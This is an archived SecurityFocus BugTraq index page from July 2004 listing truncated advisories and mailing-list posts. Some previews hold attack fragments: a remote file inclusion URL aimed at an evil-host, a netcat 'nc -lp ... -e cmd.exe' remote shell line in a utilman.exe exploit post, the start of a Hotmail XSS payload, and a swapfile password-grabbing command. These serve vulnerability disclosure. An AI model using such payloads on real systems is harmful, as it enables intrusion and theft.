BugTraq Mode:
(Page 1476 of 1748)  < Prev  1471 1472 1473 1474 1475 1476 1477 1478 1479 1480 1481  Next >
OpenServer 5.0.6 OpenServer 5.0.7 : MMDF Various buffer overflows and other security issues 2004-07-19
please_reply_to_security sco com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________
______

SCO Security Advisory

Subject: OpenServer 5.0.6 OpenServer 5.0.7 : MMDF Various buffer overflows and other security issues
Advisory number: SCOSA-2004.7
Issue date:

[ more ]  [ reply ]
[FLSA-2004:1324] Updated libxml2 resolves security vulnerabilities 2004-07-20
Jesse Keating (jkeating j2solutions net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated libxml2 resolves security vulnerability
Advisory ID: FLSA:1324
Issue date: 2004-07-19
Product

[ more ]  [ reply ]
Artmedic kleinanzeigen include vulnerability 2004-07-19
Francisco Alisson (dominusvis click21 com br)


Artmedic kleinanzeigen allow code inclusion in index.php.

Exploit:

www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.c
om

An evil attacker could be use this vulnerability to execute

php code with the same user id of the running server.

Thanks and sorry for th

[ more ]  [ reply ]
Re: PHP BB bug 2004-07-18
Micheal Cottingham (webmaster michealcottingham com)
As per the Project Manager of phpBB, it is an added feature. (I spoke to
him about this already.) There is no exploit or bug.

Christian Jonassen wrote:

>Hmm.
>
>Highlighting everything---what's dangerous about that?
>
> - Christian NJ
>
>On Thu, 15 Jul 2004 16:04:21 -0400, micheal@michealcottingh

[ more ]  [ reply ]
RE: Mac OS X stores login/Keychain/FileVault passwords on disk 2004-07-19
Michael Shirk (shirkdog_linux hotmail com)
Pretty much it is a security risk to have an Apple laptop or desktop process
any classified information. As long as physical access is used as you
suggested a lock rack you are fine for 1U Xserves. However, the typical user
on a subway with an iBook could be a major risk.

I have set all of the o

[ more ]  [ reply ]
[waraxe-2004-SA#036 - Multiple security holes in PhpNuke - part 3] 2004-07-18
Janek Vind (come2waraxe yahoo com)


{=======================================================================
=========}

{ [waraxe-2004-SA#036] }

{=======================================================================
=========}

{

[ more ]  [ reply ]
new utilman.exe exploit (allinone remote exploitation) 2004-07-17
Iván Rodriguez Almuiña (kralor coromputer net)
utilman.exe exploit version 2.666 by kralor
-----------------------------------------------------------
v2.666: autonomous (allinone) remote exploitation system ;)
-----------------------------------------------------------
It can be executed through poor cmd.exe shells (like
nc -lp 666 -e cmd.exe f

[ more ]  [ reply ]
[SECURITY] [DSA 529-1] New netkit-telnet-ssl package fixes format string vulnerability 2004-07-18
Matt Zimmerman (mdz debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 529-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Matt Zimmerman
July 17th, 2004

[ more ]  [ reply ]
[SECURITY] [DSA 530-1] New l2tpd packages fix buffer overflow 2004-07-18
Matt Zimmerman (mdz debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 530-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Matt Zimmerman
July 17th, 2004

[ more ]  [ reply ]
[SECURITY] [DSA 528-1] New ethereal packages fix denial of service 2004-07-18
Matt Zimmerman (mdz debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 528-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Matt Zimmerman
July 17th, 2004

[ more ]  [ reply ]
RE: The Impact of RFC Guidelines on DNS Spoofing Attacks 2004-07-18
have2Banonymous (a637831 yahoo com)

Hi,

The DNS paper is not at the mentioned URL since it was published in phrack instead, and can be
found at the URL http://www.phrack.org/show.php?p=62&a=3

> -----Original Message-----
> From: have2Banonymous [mailto:a637831 (at) yahoo (dot) com [email concealed]]
> Sent: Monday, July 12, 2004 5:46 AM
> To: bugtraq@securit

[ more ]  [ reply ]
Re: Mac OS X stores login/Keychain/FileVault passwords on disk 2004-07-17
Kurt Seifried (bt seifried org) (2 replies)
>FWIW: You can enable the security features of OpenFirmware on modern Apple
>hardware, such that things like "boot from CD", "target disk mode", etc,
>are all disabled.

FWIW this is utterly worthless.

>It adds at least another barrier for people to have to get around to
>get your data. More infor

[ more ]  [ reply ]
Re: Mac OS X stores login/Keychain/FileVault passwords on disk 2004-07-19
James Goodlet (J S Goodlet sussex ac uk)
Re: Mac OS X stores login/Keychain/FileVault passwords on disk 2004-07-19
Chris Boyd (cboyd gizmopartners com)
Mozilla Bug Isn't So Bad 2004-07-17
Paul (paul greyhats cjb net) (1 replies)


ok so mozilla can execute existing files on the user's system. so what? how many times has this happened to internet explorer? this is an insignificant vulnerability compared to everything in ie. internet explorer has been vulnerable to the codebase vulnerability for several years. also, you can't

[ more ]  [ reply ]
Re: Mozilla Bug Isn't So Bad 2004-07-19
Bill (bill vectracon com)
What A Drag 2004-07-17
http-equiv (at) excite (dot) com [email concealed] (1 malware com)


Internet Explorer supports a fantastic variety of "styles"
amongst other 'unique capabilities'. A lovely demonstration of
that can be found here:

http://www.malware.com/wattadrag.html

--
http://www.malware.com

[ more ]  [ reply ]
Re: Hotmail Cross Site Scripting Vulnerability 2004-07-17
Andrew Hunter (andiroohunter msn com)
I've just been looking at this hotmail XSS attack, for people who couldn't
get it to work you need to set the mime type to HTML.

I've looked at this issue with IE, and i've noticed another problem, if i
send the line below to a hotmail address the url gets spoofed.

<!--[if IE gte 5]><img
src="j

[ more ]  [ reply ]
Re: Norton AntiVirus Denial Of Service Vulnerability [Part: !!!] 2004-07-16
Bipin Gautam (visitbipin hotmail com)
In-Reply-To: <OF4FE03EE4.3D6B6CBB-ON88256ED0.00717712-87256ED0.0077C6E6 (at) symantec (dot) com [email concealed]>

there has been reports norton AntiVirus 2004 and norton AntiVirus 2005 (beta) is also prone to the exploit.

It's always hard to handle such tricks unless you specify a timeout value to scan a particular fi

[ more ]  [ reply ]
Re: Mac OS X stores login/Keychain/FileVault passwords on disk 2004-07-16
johnny ihackstuff com


The issue of getting into AES128 encrypted disk images is easy to

unravel with this swapfile problem.

We'll start by grabbing the volume name of an AES128 encrypted disk

image file. Assuming the image name is test1.dmg, try:

root# strings -8 /var/vm/swapfile* | grep -B1 test1.dmg | gre

[ more ]  [ reply ]
(Page 1476 of 1748)  < Prev  1471 1472 1473 1474 1475 1476 1477 1478 1479 1480 1481  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus